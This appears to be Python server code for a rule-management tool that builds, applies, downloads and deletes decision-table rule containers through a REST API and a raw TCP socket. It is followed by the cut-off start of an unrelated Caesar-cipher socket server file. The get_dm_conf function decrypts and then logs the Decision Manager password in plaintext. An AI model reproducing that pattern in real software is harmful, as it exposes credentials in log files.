RuleType.objects.filter(
rule_type_id=ruletypeid
).update(
current_container_id_product=ContID,
last_update_timestamp=now,
last_update_user=user.user_name
)
elif reqtypeid == STAGING:
RuleType.objects.filter(
rule_type_id=ruletypeid
).update(
current_container_id_staging=ContID,
last_update_timestamp=now,
last_update_user=user.user_name
)
# システム処理状態更新
# 適用完了
if reqtypeid == PRODUCTION:
ruleManage.system_status = RULE_STS_SYSTEM.PRODUCT_OK
ruleManage.operation_status = RULE_STS_OPERATION.PRODUCT
elif reqtypeid == STAGING:
ruleManage.system_status = RULE_STS_SYSTEM.STAGING_OK
ruleManage.operation_status = RULE_STS_OPERATION.STAGING_NOTYET
ruleManage.last_update_timestamp = now
ruleManage.last_update_user = user.user_name
ruleManage.save(force_update=True)
# 古いコンテナが存在する場合は削除
if oldContID:
# スリープ処理
time.sleep(5)
# 古いコンテナ削除
headers = {
'accept': 'application/json',
'content-type': 'application/json',
}
HTTP2 = '%s://%s/decision-central/rest/controller/management/servers/default-kieserver/containers/%s' % (
PROTOCOL, IPADDRPORT, oldContID)
response2 = requests.delete(HTTP2, headers=headers, auth=(dmuser, dmpass))
logger.system_log('LOSI12000', 'response2: %s, oldContID: %s' % (response2, oldContID))
# プロダクション処理の場合
# システム処理状態更新
mod_sts = RULE_STS_OPERATION.STAGING_END
if reqtypeid == PRODUCTION:
mod_sts = RULE_STS_OPERATION.PRODUCT_END
if len(old_manage_ids) > 0:
RuleManage.objects.filter(
rule_manage_id__in=old_manage_ids).exclude(
rule_manage_id=manageid
).update(
operation_status=mod_sts,
last_update_timestamp=now,
last_update_user=user.user_name
)
if response2.status_code != 204:
if response2.status_code == 400:
msg = 'MOSJA03215'
errmessage = str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03215', lang)
logger.system_log('LOSM12032', str(request['apply_user_id']), reqtypeid, ContID)
raise Exception(errmessage)
# コンテナ削除時の接続エラーはすでに削除済みであるためファイルに記載し、準正常とする。
elif response2.status_code == 404:
errmessage = str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03216', lang) + '\n'
with open(errfilepath, 'a', encoding='utf8') as f:
f.write(errmessage)
logger.system_log('LOSM12033', str(request['apply_user_id']), reqtypeid, ContID)
else:
msg = 'MOSJA03217'
errmessage = str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03217', lang)
logger.system_log('LOSM12034', str(request['apply_user_id']), reqtypeid, ContID)
raise Exception(errmessage)
# 世代管理
table_name = rule_type.rule_table_name
dtcomp = DecisionTableComponent(table_name)
dtcomp.set_rule_type_id(ruletypeid)
if reqtypeid == PRODUCTION:
production_generation = int(System.objects.get(config_id='PRODUCTION_GENERATION').value)
if production_generation > 0:
# プロダクション適用履歴管理の方を消す
production_rules_queryset = RuleManage.objects.filter(
rule_type_id=ruletypeid, request_type_id=reqtypeid
).filter(
system_status=RULE_STS_SYSTEM.PRODUCT_OK
)
p_rules_cnt = production_rules_queryset.count()
if p_rules_cnt > production_generation:
p_rules = list(production_rules_queryset.order_by('rule_manage_id').reverse())
p_rules_del = p_rules[production_generation:]
logger.system_log('LOSI12007', ', '.join([str(r.rule_manage_id) for r in p_rules_del]))
for p_rule_manage in p_rules_del:
# ルールファイル削除
# ただしステージングで使用されているものはチェックして消さない
p_rule_file_id = p_rule_manage.rule_file_id
qs = RuleManage.objects.filter(
rule_type_id=ruletypeid, request_type_id=STAGING, rule_file_id=p_rule_file_id)
if qs.count() == 0:
dstpath = '%s%s/%s/' % (request['rule_dstpath'], ruletypeid, p_rule_file_id)
dtcomp.remove_component_related_one_file(dstpath)
dtcomp.remove_mavenrepository_related_one_file(p_rule_file_id)
else:
logger.system_log('LOSM12058', p_rule_file_id)
# manage削除
p_rule_manage.delete()
# プロダクション適用中のエラーがあった方を消す
RuleManage.objects.filter(
rule_type_id=ruletypeid, request_type_id=reqtypeid
).filter(
system_status=RULE_STS_SYSTEM.PRODUCT_NG
).delete()
elif reqtypeid == STAGING:
staging_generation = int(System.objects.get(config_id='STAGING_GENERATION').value)
if staging_generation > 0:
# ステージング削除
staging_rules_queryset = RuleManage.objects.filter(
rule_type_id=ruletypeid,
request_type_id=reqtypeid
).exclude(
system_status__in=[
RULE_STS_SYSTEM.UPLOAD,
RULE_STS_SYSTEM.UPLOAD_OK,
RULE_STS_SYSTEM.BUILD,
RULE_STS_SYSTEM.BUILD_OK,
])
s_rules_cnt = staging_rules_queryset.count()
if s_rules_cnt > staging_generation:
s_rules = list(staging_rules_queryset.order_by('rule_manage_id').reverse())
s_rules_del = s_rules[staging_generation:]
logger.system_log('LOSI12008', ', '.join([str(r.rule_manage_id) for r in s_rules_del]))
for s_rule_manage in s_rules_del:
# ルールファイル削除
# ただしプロダクションで使用されているものはチェックして消さない
s_rule_file_id = s_rule_manage.rule_file_id
qs = RuleManage.objects.filter(
rule_type_id=ruletypeid, request_type_id=PRODUCTION, rule_file_id=s_rule_file_id)
if qs.count() == 0:
dstpath = '%s%s/%s/' % (request['rule_dstpath'], ruletypeid, s_rule_file_id)
dtcomp.remove_component_related_one_file(dstpath)
dtcomp.remove_mavenrepository_related_one_file(s_rule_file_id)
else:
logger.system_log('LOSM12059', s_rule_manage.rule_file_id)
# manage削除
s_rule_manage.delete()
ret_info = {
'result': 'OK',
'msg': 'MOSJA03003',
}
except RuleFile.DoesNotExist:
logger.system_log('LOSM12019', traceback.format_exc())
ret_info = {
'result': 'NG',
'msg': 'MOSJA03013',
}
except User.DoesNotExist:
logger.system_log('LOSM12022', traceback.format_exc())
ret_info = {
'result': 'NG',
'msg': 'MOSJA32010',
}
except RuleManage.DoesNotExist:
errmessage = str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03218',
lang, manageid=manageid).replace('\n', '\n')
errmessage = errmessage + '\n'
with open(errfilepath, 'a', encoding='utf8') as f:
f.write(errmessage)
logger.system_log('LOSM12035', str(request['apply_user_id']), manageid, traceback.format_exc())
ret_info = {
'result': 'NG',
'msg': 'MOSJA03302',
}
except Exception as e:
try:
rulemanage = RuleManage.objects.get(rule_manage_id=manageid)
if reqtypeid == STAGING:
rulemanage.system_status = RULE_STS_SYSTEM.STAGING_NG
rulemanage.last_update_timestamp = now
rulemanage.last_update_user = user.user_name
rulemanage.save(force_update=True)
elif reqtypeid == PRODUCTION:
rulemanage.system_status = RULE_STS_SYSTEM.PRODUCT_NG
rulemanage.last_update_timestamp = now
rulemanage.last_update_user = user.user_name
rulemanage.save(force_update=True)
errmessage = str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03219', lang).replace('\n', '\n')
errmessage = errmessage + '\n' + str(now_tz) + ' ' + userlog + ' ' + str(e) + '\n'
with open(errfilepath, 'a', encoding='utf8') as f:
f.write(errmessage)
logger.system_log('LOSM12036', str(request['apply_user_id']), reqtypeid, manageid, traceback.format_exc())
ret_info = {
'result': 'NG',
'msg': msg,
}
except Exception as e:
logger.system_log('LOSM12036', str(request['apply_user_id']), reqtypeid, manageid, traceback.format_exc())
ret_info = {
'result': 'NG',
'msg': 'MOSJA03219',
}
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
def download(request):
logger.logic_log('LOSI00001', 'manageid: %s, ruletypeid: %s' % (request['rule_manage_id'], request['ruletypeid']))
manageid = request['rule_manage_id']
ruletypeid = request['ruletypeid']
testrequestflag = request['file_name_expansion']
rule_file_id, rule_filename, rule_table_name, errmsg = _get_downloadfile_info(
ruletypeid, manageid, testrequestflag, request)
ret_info = {
'result': 'OK',
'msg': 'OK',
'filename': rule_filename,
'filedata': '',
}
if errmsg:
ret_info.update(
result='NG',
msg=errmsg,
filename='',
filedata='',
)
logger.system_log('LOSM12037', ruletypeid, manageid)
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
# テストリクエスト用エクセルDLの場合
if len(request['file_name_expansion']) > 0:
dtcomp = DecisionTableComponent(rule_table_name)
dtcomp.set_rule_type_id(ruletypeid)
dtcomp.set_path()
rule_filepath = dtcomp.get_dtable_path() + rule_filename
ret_info['filename'] = rule_filename
else:
# ルールファイル読み込み
rule_filepath = request['rule_filepath'] % (ruletypeid, rule_file_id) + rule_table_name + '/' + rule_filename
if os.path.exists(rule_filepath):
with open(rule_filepath, 'rb') as fp:
ruledata = base64.b64encode(fp.read()).decode('utf-8')
ret_info.update(filedata=ruledata)
else:
ret_info.update(
result='NG',
msg='MOSJA03304',
filename='',
filedata=''
)
logger.system_log('LOSM12038', rule_filepath)
logger.logic_log('LOSI00002', 'result: %s, msg: %s, filename: %s' %
(ret_info['result'], ret_info['msg'], ret_info['filename']))
return ret_info
def download_zip(request):
"""
[概要]
excelファイルとエラーログファイルをまとめたzipファイルをダウンロード
"""
logger.logic_log('LOSI00001','manageid: %s, ruletypeid: %s' % (request['rule_manage_id'], request['ruletypeid']))
with DOWNLOAD_LOCK:
manageid = request['rule_manage_id']
ruletypeid = request['ruletypeid']
rule_file_id, rule_filename, rule_table_name, errmsg = _get_downloadfile_info(
ruletypeid, manageid, '', request=request)
ret_info = {
'result': 'OK',
'msg': 'OK',
'filename': rule_filename,
'filedata': '',
}
if errmsg:
ret_info.update(
result='NG',
msg=errmsg,
filename='',
filedata=''
)
logger.system_log('LOSM12037', ruletypeid, manageid)
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
# excelファイルパス, errorlogファイルパス,保存先パスをset
rule_filename_body = rule_filename.split('.')[0]
rule_filepath = request['rule_filepath'] % (ruletypeid, rule_file_id) + rule_table_name + '/' + rule_filename
dstpath = '%s%s/%s/' % (request['rule_dstpath'], ruletypeid, rule_file_id)
errlog_filepath = dstpath + rule_filename_body + '_err.log'
# zipファイルを取得
zip_filename = rule_filename_body + '.zip'
filepath = _get_zipfile(rule_filepath, errlog_filepath, dstpath, zip_filename)
if os.path.exists(filepath):
# zipファイルを読み込みデータを返す
with open(filepath, 'rb') as fp:
ruledata = base64.b64encode(fp.read()).decode('utf-8')
ret_info.update(
filename=zip_filename,
filedata=ruledata
)
else:
ret_info.update(
result='NG',
msg='MOSJA03304',
filename='',
filedata=''
)
logger.system_log('LOSM12038', filepath)
logger.logic_log('LOSI00002', 'result: %s, msg: %s, filename: %s' %
(ret_info['result'], ret_info['msg'], ret_info['filename']))
return ret_info
def _get_downloadfile_info(ruletypeid, manageid, testrequestflag, request):
"""
[概要]
dtまたはdtとエラーログをまとめたzipファイルに必要な情報を取得
[引数]
ruletypeid : ルール種別id
manageid : ルール管理id
[戻り値]
rule_file_id : ルール管理id
rule_filename : ルールファイル名
msg : エラーメッセージ
"""
disconnect()
# ルール種別情報を取得
logger.logic_log('LOSI00001', 'ruletypeid: %s, manageid: %s' % (ruletypeid, manageid))
ruletype = ''
artifactid = ''
try:
ruletype = RuleType.objects.get(pk=ruletypeid)
artifactid = ruletype.artifact_id
rule_table_name = ruletype.rule_table_name
except BaseException:
logger.system_log('LOSM12039', ruletypeid, traceback.format_exc())
logger.logic_log('LOSI00002', "'', '', '', '', 'MOSJA03301'")
return '', '', '', 'MOSJA03301'
# ルールファイル情報を取得
try:
rule_file_id = RuleManage.objects.get(rule_manage_id=manageid).rule_file_id
rule_filename = RuleFile.objects.get(pk=rule_file_id).rule_file_name
# テストリクエスト用エクセルDLの場合
if len(testrequestflag) > 0:
rule_filename = rule_table_name + testrequestflag
except RuleManage.DoesNotExist:
logger.system_log('LOSM12040', manageid, traceback.format_exc())
logger.logic_log('LOSI00002', 'ruletypeid: %s' % ruletypeid)
return '', '', '', 'MOSJA03302'
except RuleFile.DoesNotExist:
logger.system_log('LOSM12041', rule_file_id, traceback.format_exc())
logger.logic_log('LOSI00002', 'ruletypeid: %s' % ruletypeid)
return '', '', '', 'MOSJA03303'
logger.logic_log('LOSI00002', 'rule_id: %s, rule_filename: %s, msg: None' % (rule_file_id, rule_filename))
return rule_file_id, rule_filename, rule_table_name, None
def _get_zipfile(rule_filepath, errlog_filepath, dstpath, filename):
"""
[概要]
引数の情報からzipファイルを作成してzipファイルパスを返す
ファイルが存在しない場合は return None
[引数]
rule_filepath : ルールファイルのパス
errlog_filepath : エラーログファイルのパス
dstpath : 保存先のパス
filename : 保存ファイル名
"""
disconnect()
logger.logic_log('LOSI00001', 'rule_filepath: %s, errlog_filepath: %s, dstpath: %s, filename: %s' %
(rule_filepath, errlog_filepath, dstpath, filename))
filepath = dstpath + filename
#zipファイルが存在する場合は削除する
if os.path.exists(filepath):
os.remove(filepath)
#zipファイルを作成する
with zipfile.ZipFile(filepath, 'w', compression=zipfile.ZIP_DEFLATED) as new_zip:
if os.path.exists(errlog_filepath):
new_zip.write(errlog_filepath, arcname=os.path.basename(errlog_filepath))
if os.path.exists(rule_filepath):
new_zip.write(rule_filepath, arcname=os.path.basename(rule_filepath))
logger.logic_log('LOSI00002', 'filepath: %s' % filepath)
return filepath
def download_dt(request):
disconnect()
logger.logic_log('LOSI00001', request)
filename = ''
ruledata = ''
ruletypeid = int(request['ruletypeid'])
try:
ruletype = RuleType.objects.get(rule_type_id=ruletypeid)
except RuleType.DoesNotExist:
logger.system_log('LOSM12039', ruletypeid, traceback.format_exc())
ret_info = {
'result': 'NG',
'msg': 'MOSJA03302',
'filename': '',
'filedata': '',
}
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
dtcomp = DecisionTableComponent(ruletype.rule_table_name)
dtcomp.set_rule_type_id(ruletypeid)
dtcomp.set_path(src_path=rule_path['rule_srcpath'], root_path=('%s%s/' % (request['rule_rootpath'], ruletypeid)))
rule_filepath = dtcomp.get_dtable_path()
filename = '%s.xlsx' % (ruletype.rule_table_name)
# ルールファイル読み込み
filepath = rule_filepath + filename
if not os.path.exists(filepath):
ret_info = {
'result': 'NG',
'msg': 'MOSJA03304',
'filename': '',
'filedata': '',
}
logger.system_log('LOSM12038', filepath)
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
# ルールファイルのアクション種別の選択肢を更新する
ruledata = None
try:
customizer = DecisionTableCustomizer(filepath)
customizer.custom_action_type()
ruledata = customizer.output()
except Exception as e:
logger.system_log('LOSM12065', 'error: %s' % e)
logger.logic_log('LOSI00005', traceback.format_exc())
if not ruledata:
ret_info = {
'result': 'NG',
'msg': 'MOSJA03304',
'filename': '',
'filedata': '',
}
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
ruledata = base64.b64encode(ruledata).decode('utf-8')
ret_info = {
'result': 'OK',
'msg': 'OK',
'filename': filename,
'filedata': ruledata,
}
logger.logic_log('LOSI00002', 'result: %s, msg: %s, filename: %s' %
(ret_info['result'], ret_info['msg'], ret_info['filename']))
return ret_info
def get_dm_conf():
"""
[概要]
DecisionManagerの設定値を取得する
[戻り値]
protocol : str プロトコル
ipaddress : str ipアドレス
dmuser : str DecisionManagerのユーザ名
dmpass : str DecisionManagerのパスワード
"""
logger.logic_log('LOSI00001', 'None')
rset = list(System.objects.filter(category='DMSETTINGS').values('config_id', 'value'))
dmconf = {r['config_id']: r['value'] for r in rset}
# passwordを復号
cipher = AESCipher(settings.AES_KEY)
dmconf['DM_PASSWD'] = cipher.decrypt(dmconf['DM_PASSWD'])
protocol = dmconf["DM_PROTOCOL"]
ipaddrport = dmconf["DM_IPADDRPORT"]
dmuser = dmconf["DM_USERID"]
dmpass = dmconf["DM_PASSWD"]
logger.logic_log(
'LOSI00002', '(protocol, ipaddrport, dmuser, dmpass) = (%s, %s, %s, %s)' %
(protocol, ipaddrport, dmuser, dmpass))
return protocol, ipaddrport, dmuser, dmpass
def delete(request):
disconnect()
logger.logic_log('LOSI00001', request)
msg = ''
now = datetime.datetime.now(pytz.timezone('UTC'))
user_name = User.objects.get(user_id=request['user_id']).user_name
ret_info = {
'result': 'OK',
'msg': '',
}
try:
with transaction.atomic():
ruletypeid = int(request['ruletypeid'])
rule_type = RuleType.objects.select_for_update().get(rule_type_id=ruletypeid)
#########################################
# コンテナ削除
#########################################
headers = {
'accept': 'application/json',
'content-type': 'application/json',
}
# コンテナID取得
product_ContID = rule_type.current_container_id_product
staging_ContID = rule_type.current_container_id_staging
PROTOCOL, IPADDRPORT, dmuser, dmpass = get_dm_conf()
if product_ContID is not None:
HTTP2 = '%s://%s/decision-central/rest/controller/management/servers/default-kieserver/containers/%s' % (
PROTOCOL, IPADDRPORT, product_ContID)
response2 = requests.delete(HTTP2, headers=headers, auth=(dmuser, dmpass))
logger.system_log('LOSI12000', 'response2: %s, product_ContID: %s' % (response2, product_ContID))
if response2.status_code != 204 and response2.status_code != 404:
msg = 'MOSJA03607'
logger.system_log('LOSM12071', 'response2: %s, product_ContID: %s' % (response2, product_ContID))
raise Exception()
if staging_ContID is not None:
HTTP2 = '%s://%s/decision-central/rest/controller/management/servers/default-kieserver/containers/%s' % (
PROTOCOL, IPADDRPORT, staging_ContID)
response2 = requests.delete(HTTP2, headers=headers, auth=(dmuser, dmpass))
logger.system_log('LOSI12000', 'response2: %s, staging_ContID: %s' % (response2, staging_ContID))
if response2.status_code != 204 and response2.status_code != 404:
msg = 'MOSJA03607'
logger.system_log('LOSM12071', 'response2: %s, staging_ContID: %s' % (response2, staging_ContID))
raise Exception()
#########################################
# MRディレクトリ削除
#########################################
dtcomp = DecisionTableComponent(rule_type.rule_table_name)
if ruletypeid > 0:
dtcomp.remove_mavenrepository()
#########################################
# DTディレクトリ削除
#########################################
if ruletypeid > 0:
dtcomp.remove_component(ruletypeid)
#########################################
# アクセス権限管理レコード削除
#########################################
try:
ap_list = AccessPermission.objects.filter(rule_type_id=ruletypeid)
for a in ap_list:
a.disuse_flag = 1
a.last_update_user = user_name
a.last_update_timestamp = now
a.save(force_update=True)
except Exception as e:
msg = 'MOSJA03605'
logger.system_log('LOSM12066', ruletypeid, traceback.format_exc())
raise Exception()
#########################################
# ルール適用管理レコード削除
#########################################
try:
RuleManage.objects.filter(rule_type_id=ruletypeid).delete()
except Exception as e:
msg = 'MOSJA03601'
logger.system_log('LOSM12042', ruletypeid, traceback.format_exc())
raise Exception()
#########################################
# ルールファイル情報管理レコード削除
#########################################
try:
RuleFile.objects.filter(rule_type_id=ruletypeid).delete()
except Exception as e:
msg = 'MOSJA03602'
logger.system_log('LOSM12043', ruletypeid, traceback.format_exc())
raise Exception()
#########################################
# データオブジェクト管理レコード削除
#########################################
try:
DataObject.objects.filter(rule_type_id=ruletypeid).delete()
except Exception as e:
msg = 'MOSJA03603'
logger.system_log('LOSM12044', ruletypeid, traceback.format_exc())
raise Exception()
#########################################
# ルール種別管理レコード削除
#########################################
try:
rule_type.disuse_flag = 1
rule_type.rule_type_name = rule_type.rule_type_name + '_deleted_' + now.strftime('%Y%m%d%H%M%s')
rule_type.rule_table_name = rule_type.rule_table_name + '_deleted_' + now.strftime('%Y%m%d%H%M%s')
rule_type.last_update_user = user_name
rule_type.last_update_timestamp = now
rule_type.save(force_update=True)
except Exception as e:
msg = 'MOSJA03604'
logger.system_log('LOSM12045', ruletypeid, traceback.format_exc())
raise Exception()
except RuleType.DoesNotExist:
logger.system_log('LOSM12039', ruletypeid, traceback.format_exc())
ret_info = {
'result': 'NG',
'msg': 'MOSJA03301',
}
except Exception as e:
if not msg:
logger.system_log('LOSM00001', traceback.format_exc())
msg = 'MOSJA03217'
ret_info = {
'result': 'NG',
'msg': msg,
}
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
def build_kjar(request):
disconnect()
logger.logic_log('LOSI00001', request)
logger.logic_log('LOSI12001')
with APPLY_LOCK:
logger.logic_log('LOSI12002')
try:
# データ取得
now = datetime.datetime.now(pytz.timezone('UTC'))
time_zone = settings.TIME_ZONE
now_tz = conv_tz(now, time_zone)
user = User.objects.get(user_id=request['apply_user_id'])
ruletypeid = request['ruletypeid']
ruleid = request['rule_file_id']
artifactid = request['artifactid']
groupid = request['groupid']
filepath = request['pompath'] + 'pom.xml'
reqtypeid = request['request_type_id']
manageid = request['rule_manage_id']
rulefile = RuleFile.objects.get(rule_file_id=ruleid)
filename = '%s_err.log' % (rulefile.rule_file_name.rsplit('.')[0])
errfilepath = request['pompath'] + filename
userlog = 'user_id=' + str(request['apply_user_id'])
# システム処理状態更新
try:
with transaction.atomic():
ruleManage = RuleManage.objects.select_for_update().get(rule_manage_id=manageid)
ruleManage.system_status = RULE_STS_SYSTEM.BUILD
ruleManage.last_update_timestamp = now
ruleManage.last_update_user = user.user_name
ruleManage.save(force_update=True)
except Exception as e:
RuleManage.objects.filter(
rule_manage_id=manageid
).update(
system_status=RULE_STS_SYSTEM.BUILD_NG, last_update_timestamp=now, last_update_user=user.user_name
)
errmessage = str(now_tz) + ' ' + userlog + ' ' + \
get_message('MOSJA03404', user.get_lang_mode()).replace('\n', '\n')
errmessage = errmessage + '\n' + str(now_tz) + ' ' + userlog + ' ' + str(e) + '\n'
with open(errfilepath, 'a', encoding='utf8') as f:
f.write(errmessage)
logger.system_log('LOSM12046', str(request['apply_user_id']),
reqtypeid, manageid, traceback.format_exc())
ret_info = {
'result': 'NG',
'msg': 'MOSJA03401',
}
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
# pomファイル編集
regex_groupid = r'<groupId>.*</groupId>'
regex_artifactid = r'<artifactId>.*</artifactId>'
regex_version = r'<version>.*</version>'
with open(filepath, 'r+') as fp:
pom_xml = fp.read()
pom_xml = re.sub(regex_groupid, '<groupId>%s</groupId>' % (groupid), pom_xml, 1)
pom_xml = re.sub(regex_artifactid, '<artifactId>%s</artifactId>' % (artifactid), pom_xml, 1)
pom_xml = re.sub(regex_version, '<version>%s</version>' % (ruleid), pom_xml, 1)
fp.seek(0)
fp.write(pom_xml)
fp.truncate()
# ビルド実行
exec_cmd = []
exec_cmd.append('mvn')
exec_cmd.append('install')
exec_cmd.append('-Ddrools.dateformat=yyyy-MM-dd HH:mm')
exec_cmd.append('-f')
exec_cmd.append(filepath)
ret = subprocess.run(exec_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# システム処理状態更新
sys_sts = RULE_STS_SYSTEM.BUILD_OK if ret.returncode == 0 else RULE_STS_SYSTEM.BUILD_NG
try:
with transaction.atomic():
ruleManage = RuleManage.objects.select_for_update().get(rule_manage_id=manageid)
ruleManage.system_status = sys_sts
ruleManage.last_update_timestamp = now
ruleManage.last_update_user = user.user_name
ruleManage.save(force_update=True)
except Exception as e:
RuleManage.objects.filter(
rule_manage_id=manageid).update(
system_status=RULE_STS_SYSTEM.BUILD_NG,
last_update_timestamp=now,
last_update_user=user.user_name)
errmessage = str(now_tz) + ' ' + userlog + ' ' + \
get_message('MOSJA03405', user.get_lang_mode()).replace('\n', '\n')
errmessage = errmessage + '\n' + str(now_tz) + ' ' + userlog + ' ' + str(e) + '\n'
with open(errfilepath, 'a', encoding='utf8') as f:
f.write(errmessage)
logger.system_log('LOSM12047', str(request['apply_user_id']),
reqtypeid, manageid, traceback.format_exc())
ret_info = {
'result': 'NG',
'msg': 'MOSJA03402',
}
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
if ret.returncode != 0:
ruleManage.system_status = RULE_STS_SYSTEM.BUILD_NG
ruleManage.last_update_timestamp = now
ruleManage.last_update_user = user.user_name
ruleManage.save(force_update=True)
errmessage = str(now_tz) + ' ' + userlog + ' ' + \
get_message('MOSJA03406', user.get_lang_mode()).replace('\n', '\n')
errmessage = errmessage + '\n' + str(now_tz) + ' ' + userlog + ' ' + ret.stdout.decode("utf8") + '\n'
with open(errfilepath, 'a', encoding='utf8') as f:
f.write(errmessage)
logger.system_log('LOSM12048', str(request['apply_user_id']), reqtypeid, manageid, ret.returncode)
ret_info = {
'result': 'NG',
'msg': 'MOSJA03403',
}
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
except User.DoesNotExist:
ret_info = {
'result': 'NG',
'msg': 'MOSJA03101',
}
logger.system_log('LOSM12022', traceback.format_exc())
logger.logic_log('LOSI00002', ret_info)
return ret_info
except RuleFile.DoesNotExist:
ret_info = {
'result': 'NG',
'msg': 'MOSJA03013',
}
logger.system_log('LOSM12019', traceback.format_exc())
logger.logic_log('LOSI00002', ret_info)
return ret_info
except Exception as e:
RuleManage.objects.filter(
rule_manage_id=manageid).update(
system_status=RULE_STS_SYSTEM.BUILD_NG,
last_update_timestamp=now,
last_update_user=user.user_name)
errmessage = str(now_tz) + ' ' + userlog + ' ' + \
get_message('MOSJA03406', user.get_lang_mode()).replace('\n', '\n')
errmessage = errmessage + '\n' + str(now_tz) + ' ' + userlog + ' ' + str(e) + '\n'
with open(errfilepath, 'a', encoding='utf8') as f:
f.write(errmessage)
logger.system_log('LOSM12048', str(request['apply_user_id']), reqtypeid, manageid, traceback.format_exc())
ret_info = {
'result': 'NG',
'msg': 'MOSJA03403',
}
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
logger.logic_log('LOSI12003')
res = apply(request)
logger.logic_log('LOSI00002', 'res: %s' % res)
return res
# ルールファイル関連パス取得
def load_filepath():
disconnect()
logger.logic_log('LOSI00001', 'None')
rule_path = {}
rule_path['rule_rootpath'] = ''
rule_path['rule_srcpath'] = ''
rule_path['rule_dstpath'] = ''
rule_path['rule_filepath'] = ''
# "System" != "os.system" | OASE_T_SYSTEM => System(model) class
system_list = System.objects.filter(Q(config_id='RULEFILE_ROOTPATH') |
Q(config_id='RULEFILE_SRCPATH'))
for system in system_list:
if system.config_id == 'RULEFILE_ROOTPATH':
rule_path['rule_rootpath'] = system.value
if not rule_path['rule_rootpath'].endswith('/'):
rule_path['rule_rootpath'] = '%s/' % (rule_path['rule_rootpath'])
rule_path['rule_dstpath'] = rule_path['rule_rootpath']
rule_path['rule_filepath'] = '%s%%s/%%s/%s' % (rule_path['rule_dstpath'], 'src/main/resources/com/oase/')
elif system.config_id == 'RULEFILE_SRCPATH':
rule_path['rule_srcpath'] = '%s%s' % (settings.BASE_DIR, system.value)
logger.logic_log('LOSI00002', 'rule_path: %s' % rule_path)
return rule_path
def load_settings():
"""
[メソッド概要]
適用君設定情報を読み込む
"""
disconnect()
logger.logic_log('LOSI00001', 'None')
apply_settings = {}
apply_settings['host'] = '127.0.0.1'
apply_settings['port'] = 50001
rset = list(System.objects.filter(category='APPLYSETTINGS').values('config_id', 'value'))
for r in rset:
if r['config_id'] == 'APPLY_IPADDRPORT':
apval = r['value']
apval = apval.split(':')
if len(apval) == 2:
apply_settings['host'] = apval[0]
apply_settings['port'] = int(apval[1])
logger.logic_log('LOSI00002', 'apply_settings: %s' % apply_settings)
return apply_settings
if __name__ == '__main__':
logger.logic_log('LOSI00001', 'None')
apply_settings = load_settings()
host = apply_settings['host']
port = apply_settings['port']
func_info = {
'CREATE': {'func': create, 'thread': None, 'use_recv': False, 'need_keys': ['result', 'msg']},
'UPLOAD': {'func': upload, 'thread': build_kjar, 'use_recv': False, 'need_keys': ['result', 'msg']},
'APPLY': {'func': apply_req, 'thread': apply, 'use_recv': True, 'need_keys': ['result', 'msg']},
'DOWNLOAD' : {'func':download, 'thread':None, 'use_recv':False, 'need_keys':['result', 'msg', 'filename', 'filedata']},
'DOWNLOAD_ZIP': {'func':download_zip, 'thread':None, 'use_recv':False, 'need_keys':['result', 'msg', 'filename', 'filedata']},
'DOWNLOAD_DT' : {'func':download_dt, 'thread':None, 'use_recv':False, 'need_keys':['result', 'msg', 'filename', 'filedata']},
'DELETE': {'func': delete, 'thread': None, 'use_recv': False, 'need_keys': ['result', 'msg']},
}
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 8192)
sock.bind((host, port))
sock.listen(5)
logger.logic_log('LOSI12004')
while True:
try:
logger.logic_log('LOSI12005', host, port)
recv_data = bytes(b'')
clientsocket, (client_address, client_port) = sock.accept()
logger.logic_log('LOSI12006', client_address, client_port)
with clientsocket:
while True:
rcvtmp = clientsocket.recv(4096)
if not rcvtmp:
logger.logic_log('LOSI12013', len(recv_data))
break
recv_data = b'%s%s' % (recv_data, rcvtmp)
rule_path = load_filepath()
recv_data = recv_data.decode()
recv_data = json.loads(recv_data)
recv_data.update(rule_path)
need_keys = []
send_data = {}
if recv_data['request'] in func_info:
need_keys = func_info[recv_data['request']]['need_keys']
send_data = func_info[recv_data['request']]['func'](recv_data)
req_data = recv_data
if not func_info[recv_data['request']]['use_recv']:
req_data = make_send_data(send_data, omit_keys=['result', 'msg'])
req_data.update(rule_path)
if func_info[recv_data['request']]['thread']:
if 'result' in send_data and send_data['result'] == 'OK':
thrd = threading.Thread(
target=func_info[recv_data['request']]['thread'], args=(req_data,))
thrd.start()
else:
logger.system_log('LOSM12049', 'request: %s' % recv_data['request'])
need_keys = ['result', 'msg']
send_data = {
'result': 'NG',
'msg': 'MOSJA03001'
}
send_data = make_send_data(send_data, need_keys=need_keys)
ret_info = send_data
send_data = json.dumps(send_data)
send_data = send_data.encode()
clientsocket.sendall(send_data)
clientsocket.shutdown(socket.SHUT_RDWR)
clientsocket.close()
logger.logic_log('LOSI00002', 'result: %s, msg: %s' % (ret_info['result'], ret_info['msg']))
except Exception as e:
logger.system_log('LOSM12049', traceback.format_exc())
logger.logic_log('LOSI00002', 'apply_settings: %s' % apply_settings)
sock.close()
|
servidor.py
|
#!/usr/bin/env python3
'''
Trabalho Pratico 0: Redes de Computadores DCC023
Autor: Hugo Araujo de Sousa (2013007463)
servidor.py: Receives a string from each client, decodes it and sends it back
to client.
'''
import argparse as ap
import socket
import struct
import threading
import sys
# Add command line arguments.
parser = ap.ArgumentParser()
parser.add_argument('port_server', type=int, help='Server port')
args = parser.parse_args()
def decode_caesar(input_string, shift):
'''
